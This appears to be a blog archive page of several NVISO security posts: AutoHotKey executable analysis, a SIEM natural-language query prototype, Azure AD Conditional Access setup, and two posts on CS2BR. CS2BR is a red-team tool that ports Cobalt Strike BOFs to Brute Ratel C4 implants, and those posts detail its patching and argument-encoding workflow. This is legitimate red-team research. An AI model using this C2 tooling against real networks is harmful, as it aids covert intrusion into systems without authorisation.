Our ARES team at NVISO is dedicated to offer red team services to customers around the globe in order to identify gaps in the incident and response handling to improve the security posture of the companies many of us interact with daily.

See the ARES homepage for more information.

Steffen Rogge

Steffen is a Cyber Security Consultant at NVISO, where he mostly conducts Purple & Red Team assessments with a special focus on TIBER engagements.

This enables companies to evaluate their existing defenses against emulated Advanced Persistent Threat (APT) campaigns.

The SOC Toolbox: Analyzing AutoHotKey compiled executables

One day, a long time ago, whilst handling my daily tasks, an alert was generated for an unknown executable that was flagged as malicious by Microsoft cloud app security.

When I downloaded the file through Microsoft security center, I immediately noticed that it might be an AutoHotKey script. Namely, by looking at the Icon, which is the AutoHotKey logo.

As with many unknown executables I like to inspect the executable in PE studio and look at the strings. URL patterns are a quick way to see if an executable could be exfiltrating if there was no obfuscation used.

In the strings section of PE studio there were multiple mentions of AutoHotKey, which confirmed my previous suspicions that this was indeed a AutoHotKey executable. A colleague of mine mentioned this YARA rule to detect AutoHotKey executables which could be used to identify this file.

AutoHotKey executable in PE studio

After a quick internet search I found the program Exe2Ahk ( which promises to convert executables to AHK (AutoHotKey) scripts. However, this program did not work for me and I had to find another way to extract the AutoHotKey script.

Unsuccessful extraction using Exe2Ahk

Thanks to a form post on the Autohotkey forums. I found out that the uncompiled script is present in the RCDATA section of the executable. When inspecting the executable with 7zip, we notice that we can extract the script that is stored in the .rsrc\RCDATA folder. The AutoHotKey script is named: >AUTOHOTKEY SCRIPT<. The file can be extracted by simply dragging and dropping the file from the 7zip folder to any other folder on your pc.

RCDATA folder in 7Zip

Another website (where I unfortunately lost the URL to) mentioned that the same can be achieved via inspecting the file with Resource Hacker. Resource Hacker parses the PE file sections and can extract embedded files from those sections.

RCDATA folder in Resource Hacker

Once the file is extracted via your preferred method, you can open it in any text editor and start your analysis of the file, if you run in to any unknown methods or parameters used in the script or have difficulty with the syntax, the AutoHotKeys documentation can probably help you out.

In this case the file was not malicious, which is why we won’t go in more detail, but we have seen cases in the past where threat actors abused this tool to create malware.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NIVSO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

Introducing CS2BR pt. II – One tool to port them all


In the previous post of this series we showed why Brute Ratel C4 (BRC4) isn’t able to execute most BOFs that use the de-facto BOF API standard by Cobalt Strike (CS): BRC4 implements their own BOF API which isn’t compatible with the CS BOF API. Then we also outlined an approach to solve this issue: by injecting a custom compatibility layer that implements the CS BOF API using the BRC4 API, we can enable BRC4 to support any BOF.

CS2BR really can port a whole bunch of BOFs!

I’m proud to finally introduce you to our tool CS2BR (“Cobalt Strike to Brute Ratel [BOF]”) in this blog post. We’ll cover its concept and implementation, briefly discuss its usage, show some examples of CS2BR in use and draw our conclusions.

I. The anatomy of CS2BR

The tool is open-source and published on GitHub. It consists of three components: the compatibility layer (based on TrustedSec’s COFFLoader), a source-code patching script implemented in Python and an argument encoder script (also based on COFFLoader). Let’s take a closer look at each of those individually:

The Compatibility Layer

As outlined in the first blog post, the compatibility layer provides implementations of the CS BOF API for the original beacons and also comes with a new coffee entrypoint that is invoked by BRC4, pre-processes BOF input parameters and calls the original BOF’s go entrypoint.

For practical reasons that become apparent further down this post, the layer is split into two files: one for the BOF API implementation (beacon_wrapper.h) and entrypoint (badger_stub.c), respectively.

The BOF API implementation borrows heavily from COFFLoader and adds some bits and pieces, such as the Win32 APIs imported by default by CS (GetProcAddress, GetModuleHandle, LoadLibrary and FreeLibrary) and a global variable for the __dispatch variable used by BRC4 BOFs for output. Note that as of this writing, CS2BR doesn’t implement the complete CS BOF API and lacks functions related to process tokens and injection, as those weren’t considered worthwhile pursuing yet.

The entrypoint itself, on the other hand, was built from scratch. Since BRC4’s coffee entrypoint can only be supplied with string-based parameters (whereas CS’ go takes arbitrary bytes), this custom one optionally base64-decodes an input string and forwards it to the CS go entrypoint. To generate the base64-encoded input argument, CS2BR comes with a Python script (, based on COFFLoader’s implementation) that assembles a binary blob of data to be passed to BOFs (such as integers, strings and files).

Patching source code

The compatibility layer alone only gets you so far though – it needs to be patched into a BOF somehow. That’s where the patcher comes in. It’s a Python script that injects the compatibility layer’s source code into any BOF’s source code. Its approach to this is simple and only consists of two steps:

  1. Identify original CS BOF API header files (default beacon.h) and replace their contents with CS2BR’s compatibility layer implementation beacon_wrapper.h.
  2. Identify files containing the original CS BOF go entrypoint and append CS2BR’s custom coffee entrypoint from badger_stub.c.

When I started working on the patcher’s implementation, I wasn’t sure just how tricky these two steps would be to implement: Would I need to come up with tons of RegEx’s to CS BOF API identify imports? Would I maybe need to parse the actual source code using the actual C grammar to find go entrypoints? Or would I need to compile individual object files and extract line-number information from their metadata?

Luckily, I didn’t have to deal with most of the above. The CS BOF API imports are consistently included as a separate header file called beacon.h, thus they can be found by name in most cases. To find the entrypoint, I wrote a single RegEx: \s+(go)\s*\(([^,]+?),([^\)]+?)\)\s*\{. Let’s briefly break it down using Cyril’s Regex Tester:

The regex used to identify the CS entrypoint in source code

The patterns matches:

  • “go” (optionally surrounded by whitespaces),
  • an open parenthesis denoting the start of the parameter list,
  • the first char* argument (which is any character but “,”),
  • the comma separating both arguments,
  • the second int argument (matching any character but the closing parenthesis),
  • the closed parenthesis denoting the end of the parameter list and
  • an open curly bracket denoting the start of the function definition.

This pattern allows CS2BR to identify the entrypoint, optionally rename it and reuse the exact parameter names and types. Once it identified the go entrypoint in a file, it simply appends the contents of badger_stub.c to the file. This stub contains forward-declarations of base64-decoding functions used in the custom coffee entrypoint, the new entrypoint itself, and the accompanying definitions of the base64-decoding functions. And that’s it – BOFs patched this way can now be recompiled and are ready to use in BRC4. If a BOF takes input from CNA scripts, one might need to use the argument encoder.

Encoding BOF Arguments

CS BOFs can be supplied with arbitrary binary data, and the first blog post showed that BRC4 BOFs can’t since their entrypoints are designed and invoked differently. To remedy this, CS2BR borrows a utility from COFFLoader and comes with a Python script that allows operators to encode input parameters for their BOFs in a way that can be passed via BRC4 into CSBR’s custom coffee entrypoint:

CS2BR's argument encoder

One drawback of using base64-encoding is the considerable overhead: base64 encodes 3 bytes of input into 4 bytes of ASCII, resulting in 33% overhead. As can be seen in the above screenshot, the raw data of about 6kB is encoded into about 8kB. The script also implements GZIP compression of input data, reducing the raw buffer to about 2.5kB and base64 data to about 3.5kB. As of this writing, however, CS2BR’s entrypoint doesn’t support decompression yet.

II. Using CS2BR

Using CS2BR is pretty straight-forward. You’ll need to patch & compile your BOFs only once and can then execute them via BRC4. If your BOFs accept input arguments, you’ll need to generate them via CS2BR’s argument encoder. Let’s have a look at the complete workflow.

1. Setup, Patching & Compilation

Again, we’ll use CS-Situational-Awareness (SA) as an example. First, clone SA and CS2BR:

git clone
git clone

Then, invoke the patcher from the cs2br-bof repo and specify the “CS-Situational-Awareness-BOF” directory you just cloned as the source directory (--src) to patch:

CS2BR's source code patcher

Finally, compile the BOFs as you would usually do:

cd CS-Situational-Awareness-BOF

That’s it, simple BOFs (such as whoami, uptime, …) that don’t require any input arguments can be executed directly through BRC4 now:

Executing a simple patched BOF without arguments

2. Encoding Arguments

In order to supply BOFs compiled with CS2BR with input arguments, we’ll use the encode_args script.

Let’s use nslookup as an exemplary BOF for this workflow. It expects up to three input parameters, lookup valuelookup server and type, as defined in CS-Situational-Awareness’ aggressor script:

alias nslookup {
	$lookup = $2;
	$server = iff(-istrue $3, $3, "");
	$type = iff(-istrue $4, # ...
	$args = bof_pack($1, "zzs", $lookup, $server, $type);
	beacon_inline_execute($1, readbof($1, "nslookup", "Attempting to resolve $lookup", "T1018"), "go", $args);

The bof_pack call above assembles these variables into a binary blob according to the format “zzs” ($lookup and $server as null-terminated strings with their length prepended and $type as a 2-byte integer). This binary blob is disassembled by the BOF using the BeaconData* APIs.

BRC4 doesn’t support aggressor scripts, though, so CS2BR’s argument encoder serves as a workaround. As an example, let’s encode for $lookup, for $server and 1 for $type (to query A records, ref. MS documentation):

Encoding arguments for the nslookup BOF

The resulting base64 encoded argument buffer, DgAAAGJsb2cubnZpc28uZXUACAAAADguOC44LjgAAQA=, can then be passed to BRC4’s coffexec command and will be processed by CS2BR’s custom entrypoint and forwarded to the original BOF’s logic:

Running a patched BOF with generated input arguments

III. Where to go from here

Working on CS2BR has been a lot of fun and, frankly, also quite frustrating at times. After all, BRC4 isn’t an easy target system to develop for due to its black-box nature. This project has come a fairly long way nonetheless!


This blog post showed how CS2BR works and how it can be used. At this point, the tool allows you to run all your favorite open-source CS BOFs via BRC4. So in case you are used to a BOF-heavy workflow in CS and intend to switch to BRC4, now you got the tools to keep using the same BOFs.

Using CS2BR is straight-forward and doesn’t require special skills or knowledge for the most part. There are some caveats to it that should be considered before using it “in production” though:

  • Source code: CS2BR works only on a source code level. If you want to patch a BOF that you don’t have the source code for, this tool won’t be of much use to you.
  • API completeness: CS2BR does not (yet) support all of CS’s BOF C API: namely, the Internal APIs are populated with stubs only and won’t do anything. This mainly concerns BOFs utilizing CS’ user impersonation and process injection BOF API capabilities.
  • Usability: While CS2BR allows you to pass parameters to BOFs, you’ll still have to work out the number and types of parameters yourself by dissecting your BOF’s CNA. You’ll only need to figure this out once, but it’s a certain investment nonetheless.
  • Binary overhead: Patching the compatibility layer into source code results in more code getting generated, thus increasing the size of the compiled BOF. Also note that the compatibility layer code can get signatured in the future and thus become an IOC.

I’m convinced that most of those points don’t constitute actual practical problems, but rather academic challenges to tackle in the future. Overall, I think the benefit of being able to run CS BOFs in BRC4 outweighs CS2BR’s drawbacks.


While I’m happy with the current implementation, I’m convinced it can be improved upon. Expect a third, final blog post about the next iteration of CS2BR. What is it going to be about, I hear you ask? Well, let me use a meme to tease you:

Teasing the next and final (?) blog post about CS2BR
That's me!

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

Transforming search sentences to query Elastic SIEM with OpenAI API

(In the Blog Post, we will demonstrate a Proof-of-Concept on how to use a OpenAI’s Large Language Model to craft Elastic SIEM queries in an automated way. Be mindful of issues with accuracy and privacy before trying to replicate this Proof-of-Concept. More info in our discussion at the bottom of this article.)

The primary task of a security analyst or threat hunter is to ask the right questions and then translate them into SIEM query languages, like SPL for Splunk, KQL for Sentinel, and DSL for Elastic. These questions are designed to provide answers about what actually happened. For example: “Identify failed login attempts, Search for a specific user’s login activities, Identify suspicious process creation, Monitor changes to registry keys, Detect user account lockouts, etc.”

The answers to these questions will likely lead to even more questions. Analysts will keep interrogating the SIEM until they get a clear answer. This allows them to piece together a timeline of all the activities and explain whether it is a false positive or an actual incident. To do this, the analysts need to know a bunch of things. First, they need to be familiar with several types of attacks. Next, they need to understand the infrastructure (cloud systems, on-premises, applications, etc.). And on top of all that, they must learn how to use these SIEM tools effectively.

Is GPT-3 capable of generating Elasticsearch DSL queries?
In this blog post, we will explore how a powerful language model by OpenAI can automate the last step and bridge the gap between human language questions and SIEM query language.

We will be presenting a brief demo of a custom chat web app that allows users to query Windows event logs using natural language and obtain results for incident handling. In our example, we used the TextDavinci-3 model from OpenAI and Elastic as a SIEM. We built the custom chat app, using vanilla JS for the client and NodeJS for the backend.

In our design, we send the analysts question to OpenAI using their API within a custom prompt. Subsequently, the resulting Elastic Query is sent to the Elastic SIEM using its API. Lastly, the result from Elastic is returned to the user.

chat app openai api with elastic siem
Web app diagram

A: User asking in the chat
B: The web app sends the initial input, enhanced with a standard phrase, to guide the model in generating more relevant and coherent responses.
C: It gets back the response: corresponding Elasticsearch query
D: The web app sends the query to Elasticsearch, after some checks
E: Elasticsearch sends back the result to web app
F: Present the results to the user in table format


In this demo, we focused on querying a specific log source, namely the “winlogbeat” index. However, it is indeed possible to expand the scope of the query by incorporating a broader index pattern that includes a wider range of log sources, such as “Beats-*” (if we are utilizing Beats for log collectors). Another approach would be to perform a search across all available sources, assuming the implementation of the Elastic Common Schema (ECS) within Elasticsearch. For instance, if we have different log types, such as Windows event logs, Checkpoint logs, etc. and we want to retrieve these logs from a specific host name, we can utilize the “” key in each log source (index). By specifying the desired host name, we can filter the logs and retrieve the relevant information from the respective log sources.

ecs example
Working with ECS

Deep drive
Below, we will go into detail on how we built the application.
To create this web app, the first thing we need is an API key from OpenAI. This key will give us access to the gpt-3 models and their functionalities.

create openai api key
Creating OpenAI API key

Next, we will utilize the OpenAI playground to experiment and interact with the TextDavinci-3 model. In this particular example, we made an effort to craft an optimal prompt that would yield the most desirable responses. Fortunately, the TextDavinci-3 model proved to be the ideal choice, providing us with excellent results. Also, the OpenAI API allows you to control the behavior of the language model by adjusting certain parameters:

  • Temperature: The temperature parameter controls the randomness of the model’s output. A higher temperature, like 0.8, makes the output more creative and random, while a lower temperature, like 0.1, makes it more focused and deterministic.
  • Max Tokens: The max tokens parameter allows you to limit the length of the model’s response. You can set a specific number of tokens to restrict the length of the generated text. Be aware that setting an extremely low value may result in the response being cut off and not making sense to the user.
  • Frequency Penalty: The frequency penalty parameter allows you to control the repetitiveness of the model’s responses. By increasing the frequency penalty (e.g., setting it to a value higher than 0), you can discourage the model from repeating the same phrases or words in its output.
  • Top P (Top Probability): The top_p parameter, also known as nucleus sampling or top probability, sets a threshold for the cumulative probability distribution of the model’s next-word predictions. Instead of sampling from the entire probability distribution, the model only considers the most probable tokens whose cumulative probability exceeds the top_p value. This helps to narrow down the possibilities and generate more focused and coherent responses.
  • Presence Penalty: The presence penalty parameter allows you to encourage or discourage the model from including specific words or phrases in its response. By increasing the presence penalty (e.g., setting it to a positive value), you can make the model avoid certain words or topics. Conversely, setting a negative value can encourage the model to include specific words or phrases.

Following that, we can proceed to export the code based on the programming language we are using for our chat web app. This will allow us to obtain the necessary code snippets tailored to our preferred language.

playground openai
OpenAI Playground code snippet

Also, it is worth mentioning that we stumbled upon an impressive attempt at, where you can check how ChatGPT translate a search sentence into an Elasticsearch DSL query (even SQL).

Returning to our experimental use case, our web app consists of two components: the client side and the server side. On the client side, we have a chat user interface (UI) where users can input their questions or queries. These questions are then sent to the server side for processing.

client custom chat app elasticsearch openaiai
UI chat

On the server side, we enhance the user’s questions by combining them with a predefined text to create a prompt. This prompt is then sent to the OpenAI API for processing and generating a response.

prompt send to openai
Backend code snippet- prompt OpenAI api

Once we receive the response, we perform some basic checks, such as verifying if it is a valid JSON object, before forwarding the query to our SIEM API, which in this case is Elastic. Finally, we send the reply back to the client by transforming the JSON response into an HTML table format.

But many of the responses from OpenAI API are not correct…
You are absolutely right. Not all responses from the OpenAI API can be guaranteed to be correct or accurate. Fine-tuning the model is a valuable approach to improve the accuracy of the generated results.

Fine-tuning involves training the pre-trained language models like GPT-3 and TextDavinci-3 on specific datasets that are relevant to the desired task or domain. By providing a training dataset specific to our use case, we can enable the model to learn from and adapt to the context, leading to more accurate and tailored responses.

To initiate the fine-tuning process, we would need to prepare a training dataset comprising a minimum of 500 examples in any text format. This data set should cover a diverse range of scenarios and queries related to our specific use case. By training the model on this dataset, we can enhance its performance and ensure that it generates more accurate and contextually appropriate responses for our application.

{"prompt": "show me the last 5 logs from the user sotos", "completion": " {\n\"query\": {\n    \"match\": {\n..... "}
{"prompt": "...........", "completion": "................."}

Even if we invest efforts in fine-tuning the model and striving for improvement, it is important to acknowledge that new versions and functionalities are regularly integrated into the Elasticsearch query language. It is worth noting that the knowledge perspective of ChatGPT is limited to information available up until September 2021. Similar to numerous companies, Elastic has recently developed a plugin that enable ChatGPT to tap into Elastic’s up-to-date knowledge base and provide assistance with the latest features introduced by Elastic.

Everything seems perfect so far, but…what about security and privacy of data?

Indeed, privacy and security are important concerns when dealing with sensitive data, especially in scenarios where queries or requests might expose potentially confidential information. In the described scenario, the actual logs are not shared with OpenAI, but the queries themselves reveal certain information, such as specific usernames or host names (ex. “find the logs for the user mitsos” or “show me all the failed logon attempts from the host WIN-SOTO.”).

In accordance with the data usage policies of OpenAI API (in contrast to ChatGPT), it refrains from utilizing the data provided through its API to train its models or enhance its offerings. It is worth noting, however, that data transmitted to their APIs is handled by servers situated in the United States, and OpenAI retains the data you submit via the API for a period of up to 30 days for the purpose of monitoring potential abuses. Nevertheless, OpenAI grants you the ability to choose not to participate in this monitoring, thereby ensuring that your data remains neither stored nor processed. To exercise this option, you can make use of the provided form. Consequently, each API call initiates and concludes your data’s lifecycle. The data is transmitted through the API, and the API call’s response contains the resulting output. It does not retain or preserve any data transmitted during successive API requests.

In conclusion, by leveraging OpenAI’s language processing capabilities, organizations can empower security analysts to express their query intentions in a natural language format. This approach streamlines the SIEM query creation process, enhances collaboration, and improves the accuracy and effectiveness of security monitoring and incident response. With OpenAI’s assistance, bridging the gap between human language and SIEM query language becomes an achievable reality in the ever-evolving landscape of cybersecurity. Last but not least, the privacy issue surrounding ChatGPT and OpenAI API usage raises a significant point that necessitates thoughtful consideration, before creating new implementations.

nikos sam

Nikos Samartzopoulos

Nikos is a Senior Consultant in the SOC Engineer Team. With a strong background in data field and extensive knowledge of Elastic Stack, Nikos has cultivated his abilities in architecting, deploying, and overseeing Elastic SIEM systems that excel in monitoring, detecting, and swiftly responding to security incidents.

Enforce Zero Trust in Microsoft 365 – Part 3: Introduction to Conditional Access

Enforce Zero Trust in Microsoft 365 - Part 3: Introduction to Conditional Access

This blog post is the third blog post of a series dedicated to Zero Trust security in Microsoft 365.

In the first two blog posts, we set the basics by going over the free features of Azure AD that can be implemented in an organization that starts its Zero Trust journey in Microsoft 365. We went over the Security Defaults, the per-user MFA settings and some Azure AD settings that allowed us to improve our default security posture when we create a Microsoft 365 environment.

Previous blog posts:


In this blog post, we will see what Azure AD Conditional Access is, how it can be used to further improve security and introduce its integration capabilities with other services.

As a reminder, our organization has just started with Microsoft 365. However, we have decided to go for Microsoft 365 for our production environment. Therefore, we want to have a look at a more advanced feature, Azure AD Conditional Access policies. This feature requires an Azure AD Premium P1 license which comes as a standalone license or which is also included in some Microsoft 365 licenses (Microsoft 365 E3/A3/G3/F1/F3, Enterprise Mobility & Security E3, Microsoft 365 Business Premium, and higher licenses). Note that one license should be assigned to each user in scope of any Conditional Access policies.

Azure AD Conditional Access allows to take identity-driven signals to make decisions and enforce policies. They can be seen as if-then statements. For instance, if a user wants to access SharePoint Online, which is a Microsoft cloud application that can be integrated in such policies, the user, more specifically, the user’s request, is required to meet specific requirements, defined in those policies. Let’s now see what the capabilities of those policies are.

Conditional Access

This part will be more theoretical to make sure everyone has the basics. Therefore, if you are already familiar to Azure AD Conditional Access Policies, you can directly jump to the next section for the implementation where we go over some prerequisites and important actions that need to be done to avoid troubles when setting up those policies based on our hands-on experience.

Conditional Access signals

As we have seen, signals will be considered to make a decision. It is possible to configure the following signals:

  • User, group membership or workload identities (also known as service principals or managed identities in Azure): It is possible to target or exclude specific users, groups, or workload identities from a Conditional Access policy;
  • Cloud apps or actions: Specific cloud applications such as Office 365, the Microsoft Azure Management, Microsoft Teams applications, etc. can be targeted by a policy. Moreover, specific user actions like registering security information (registering to MFA or Self-Service Password Reset) or joining devices can be included as well. Finally, authentication context can also be included. Authentication contexts are a bit different as they can be used to protect specific sensitive resources accessed by users or user actions in the environment. We will discuss authentication contexts in details in later blog post;
  • Conditions: With an Azure AD Premium P1 license, specific conditions can be set. This includes:
    • The device platforms: Android, iPhone, Windows Phone, Windows, macOS and Linux;
    • The locations: Conditional Access works with Named Locations which can include country/countries or IP address(es) that can be seen as trusted or untrusted;
    • The client apps: client apps which support modern authentication: Browser and Mobile apps and desktop clients; and legacy authentication clients: Exchange ActiveSync clients and other clients;
    • Filter for devices: allows to target or exclude devices based on their attributes such as compliance status in the device management solution, if the device is managed in Microsoft Endpoint Manager or on-premises, or registered in Azure AD, as well as custom attributes that have been set on devices;
    • Note that these conditions need to be all matched for the policy to apply. If a condition such as the location is excluded and match an attempt to access an application, the policy will not apply. Finally, if multiple policies matched, they will all apply, and access controls will be combined (the most restrictive action will be applied in case of conflicts).

Conditional Access access controls

Then, we have the access controls which are divided into two main categories, the “grant” and the “session” controls. These access controls define the “then do this” part of the Conditional Access policy (if all conditions have matched as mentioned previously). They can be used to allow or block access, require MFA, require the device to be compliant or managed as well as other more specific controls.

Grant controls

  • Block access: if all conditions have matched, then block access;
  • Grant access: if all conditions have matched, then grant access and optionally apply one or more of the following controls:
    • No controls are checked: Single-Factor Authentication is allowed, and no other access controls are required;
    • Require Multi-Factor Authentications;
    • Require authentication strength: allows to specify which authentication method is required for accessing the application;
    • Require device to be marked as compliant: this control requires devices to be compliant in Intune. If the device is not compliant, the user will be prompted to make the device compliant;
    • Require Hybrid Azure AD joined devices: this control requires devices to be hybrid Azure AD joined meaning that devices must be joined from an on-premises Active Directory. This should be used if devices are properly managed on-premises with Group Policy Objects or Microsoft Endpoint Configuration Manager, formerly SCCM, for example;
    • Require approved client apps: approved client apps are defined by Microsoft and represent applications that supports modern authentication;
    • Require app protection policy: app protection policies can be configured in Microsoft Intune as part of Mobile Application Management. This control does not require mobile devices to be enrolled in Intune and therefore work with bring-your-own-device (BYOD) scenarios;
    • Require password change;
    • For multiple controls (when multiple of the aforementioned controls are selected):
      • Require all the selected controls;
      • Require one of the selected controls.

Session controls

  • Use app enforced restrictions: app enforced restrictions require Azure AD to pass device information to the selected cloud app to know if a connection is from a compliant or domain-joined device to adapt the user experience. This control only works with Office 365, SharePoint Online and Exchange Online. We will see later how this control can be used;
  • Use Conditional Access App Control: this is the topic of a later blog post, but it allows to enforce specific controls for different cloud apps with Microsoft Defender for Cloud Apps;
  • Sign-in frequency: this control defines how often users are required to sign in again every (x hours or days). The default period is 90 days;
  • Persistent browser session: when a persistent session is allowed, users remain signed in even after closing and reopening their browser window;
  • Customize continuous access evaluation: continuous access evaluation (CAE) allows access tokens to be revoked based on specific critical events in near real time. This control can be used to disable CAE. Indeed, CAE is enabled by default in most cases (CAE migration);
  • Disable resilience defaults: when enabled, which is the case by default, this setting allows to extend access to existing session while enforcing Conditional Access policies. If the policy can’t be evaluated, access is determined by resilience settings. On the other hand, if disabled, access is denied once the session expires;
  • Require token protection for sign-in sessions: this new capability has been designed to reduce attacks using token theft (stealing a token, hijacking or replay attack) by creating a cryptographically secure tie between the token and the device it is issued to. At the time of writing, token protection is in preview and only supports desktop applications accessing Exchange Online and SharePoint Online on Windows devices. Other scenarios will be blocked. More information can be found here.

Conditional Access implementation

Before getting started with the implementation of Conditional Access policies, there are a few important considerations. Indeed, the following points might determine if our Zero Trust journey is a success or a failure in certain circumstances.

Per-user MFA settings

If you decided to go for the per-user MFA settings during the first blog post, you might consider the following:

  • As mentioned before, Conditional Access policies can be used to enforce a sign-in frequency. However, this can also be achieved using the ‘remember multi-authentication’ setting. If both settings are configured, the sign-in frequency enforced on end users will be a mix of both configuration and will therefore lead to prompting users unexpectedly;
  • If trusted IPs, which require an Azure AD Premium P1 license, have been configured in the per-user MFA settings, they will conflict with named locations in Azure AD Conditional Access. Named locations allow you to define locations based on countries or IP address ranges that can then be used to allow or block access in policies. Besides that, if possible, named locations should be used because they allow more fine-grained configurations as they do not automatically apply to all users and in all scenarios;
  • Finally, before enforcing MFA with Conditional Access policies, all users should have their MFA status set to disabled.

Security Defaults

Moreover, if you opted for the Security Defaults, it needs to be disabled as they can’t be used together.

How and where to start?

Now that we have some concepts about Conditional Access and some considerations for the implementation, we can start with planning the implementation of our policies. First, we need to ensure that we know what we want to achieve and what the current situation is. In our case, we first want to enforce MFA for all users to prevent brute force and protect against simple phishing attacks.

However, there might be some user accounts used as services accounts in our environment, such as the on-premises directory synchronization account for hybrid deployments, which can’t perform multi-factor authentication. Therefore, we recommend identifying these accounts and excluding them from the Conditional Access policy. However, because MFA would not be enforced on these accounts, they are inherently less secure and prone to brute force attacks. For that purpose, Named Locations could be used to only allow these service accounts to login from a defined trusted location such as the on-premises network (this now requires an additional license for each workload identity that you want to protect: Microsoft Entra Workload Identities license). Except for the directory synchronization account, we do not recommend the use of user accounts as service accounts. Other solutions are provided by Microsoft to manage applications in Azure in a more secure way.

Our first policy could be configured as follows (note that using a naming convention for Conditional Access policies is a best practice as it eases management):

1. Assign the policy to all users (which includes all tenant members as well as external users) and exclude service accounts (emergency/break-the-glass accounts might also need to be excluded):

Conditional Access policy assignments

2. Enforce the policy for all cloud applications:

Cloud applications
Cloud applications

3. Require MFA and enforce a sign-in frequency of 7 days:

Access controls
Access controls

4. Configure the policy in report-only first

Report-only mode
Report-only mode

We always recommend configuring Conditional Access policies in report-only mode before enabling them. The report-only feature will generate logs the same way as if the policies were enabled. This will allow us to assess any potential impact on service accounts, on users, etc. After a few weeks, if no impact has been discovered, the policy can be switched to ‘On’. Note that there might be some cases where you may want to shorten or even skip this validation period.

These logs can be easily access in the ‘Insights and reporting‘ panel in Conditional Access:

Conditional Access Insights and reporting
Conditional Access Insights and reporting


In this third blog post, we learned about Conditional Access policies by going over a quick introduction on Conditional Access signals and access controls. Then, we went over some implementation considerations to make sure our Zero Trust journey is a success by preventing unexpected behaviors and any impact on end users. Finally, we implemented our very first Conditional Access policy to require Multi-Factor Authentication on all users except on selected service accounts (which is not the best approach as explained above).

If you are interested to know how NVISO can help you planning your Conditional Access policies deployment and/or support you during the implementation, feel free to reach out or to check our website.

In my next blog post, we will see which policies can be created to enforce additional access controls without requiring user devices to be managed in Intune to further protect our environment.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Introducing CS2BR pt. I – How we enabled Brute Ratel Badgers to run Cobalt Strike BOFs

If you know all about CS, BRC4 and BOFs you might want to skip this introduction and get right into the problem statement. You can also jump right to the solution.


When we conduct Red Team assessments at NVISO, we employ a wide variety of proprietary and open source tools. One central component in these assessments is the command & control (C2) framework we use to remotely interact with compromised machines and move laterally through our targets’ networks. They usually feature a C2 server for central access, implants (analogous to bots in botnets) that execute commands, and client interfaces that allow red team operators to interact with the implants. Among others, there are two popular C2 frameworks that we use: Cobalt Strike and Brute Ratel C4.

Both C2s are proprietary and they have a lot of features in common. A particular capability they share is execution of beacon object files (BOFs). Normally you work with object files during compilation of C and C++ programs as they contain the compiled code of individual C/C++ source files and are not directly executable.

CS and BRC4 provide a mechanism to send BOFs to implants and execute their code on the remote machines. And the best thing about it is: one can write their own BOFs and have implants execute them. This comes with quite a set of benefits:

  • Implants don’t need to implement a lot of capabilities as those capabilities can be streamed and executed on demand, reducing the implant’s footprint.
  • Using custom BOFs, operators have finer control over the exact way an implant interacts with the target system. They can choose to implement new features or operate more covertly and OPSEC-safe.
  • While the C2s might be proprietary, BOFs can be open-source and shared with everyone.

There are many open-source BOFs available, such as TrustedSec’s CS-Situational-Awareness, that can easily be used in various C2s like CS and sliver. Nearly all of these BOFs use Cobalt Strike’s de-facto BOF API standard – which isn’t compatible with Brute Ratel’s BOF API. Thus, the vast majority of available BOFs is incompatible with BRC4.

Turns out there are only very few BRC4 BOFs!

In this blog post, we present an approach to solve this problem that enables Brute Ratel’s implants (“badgers”) to run BOFs written for Cobalt Strike. The tool we developed based on this approach will be presented in a follow-up blog post.

I. So what’s the exact problem?

In theory any BOF can be executed by either C2 framework so long as they don’t make any use of the C2-specific APIs. Practically, this doesn’t make much sense since using these APIs is required for basic tasks such as sending back information to operators.

The following paragraphs break down both BOF APIs in order to help understand how they’re incompatible.

Cobalt Strike’s BOF C API

Cobalt Strike BOF C API

Cobalt Strike splits its APIs into roughly four distinct groups:

  • Data Parser API: provides utilities to parse data passed to the BOF. This allows BOFs to receive arbitrary data as input, such as regular string-based values but also arbitrary binary data like files.
  • Output API: lets BOFs output raw buffers and format output. The output is sent back to operators.
  • Format API: allows BOFs to format output in buffers for later transmission.
  • Internal APIs: feature several utilities related to user impersonation, privileges and process injection. BRC4 doesn’t currently have an equivalent API.

Furthermore, the signature of CS BOFs entrypoints is void go(char*, int) and explicitly expects binary data to be passed and to be used with the Data Parser API.

Brute Ratel C4’s BOF C API

Brute Ratel BOF C API

Brute Ratel C4’s API on the other hand comes as a loose list that I grouped in this diagram for simplicity:

  • Output API: contains output printf-like functions for regular ANSI-C strings and wide-char strings.
  • String API: features various strlen and strcmp functions for regular ANSI-C strings and wide-char strings.
  • Memory API provides convenient memory-related functions for allocating, freeing, copying and populating buffers.

The signature of BRC4 BOF entrypoints is void coffee(char**, int, WCHAR**) and explicitely expects string-based inputs (similar to regular executable’s void main(int argc, char* argv[])).

Comparison & Conclusion

When comparing their APIs, it becomes apparent that CS and BRC4 follow different approaches to their APIs:

  • While both C2s provide some convenience APIs, Cobalt Strike’s APIs feature a higher abstraction level. As a result, CS doesn’t only feature an API dedicated to output (as does BRC4) but also one for formatting output.
  • CS provides advanced APIs (e.g. the “internal” ones) while BRC4 provides mostly low-level APIs.
  • Both differ greatly in their approach to passing inputs to BOFs: Cobalt Strike allows passing arbitrary binary data and provides a separate API for this task while BRC4 sticks to the traditional main entrypoint and its GUI only allows operators to pass strings to BOFs.
CS BOFs are (almost) the same as BRC4 BOFs - or at least BRC4 would like you to think that.

Actually BRC4’s documentation makes porting BOFs from CS to BRC4 look like an easy task. Simply trying to map the CS’s BOF API to BRC4’s shows that this is a more intricate task:

Cobalt Strike and Bute Ratel C4 BOF API mapping

As you can see, there are only very few CS APIs that (more or less) can be mapped to BRC4’s APIs. What are the implications for porting CS BOFs to BRC4 then? Well, it’s going to require some engineering.

II. Working out a solution

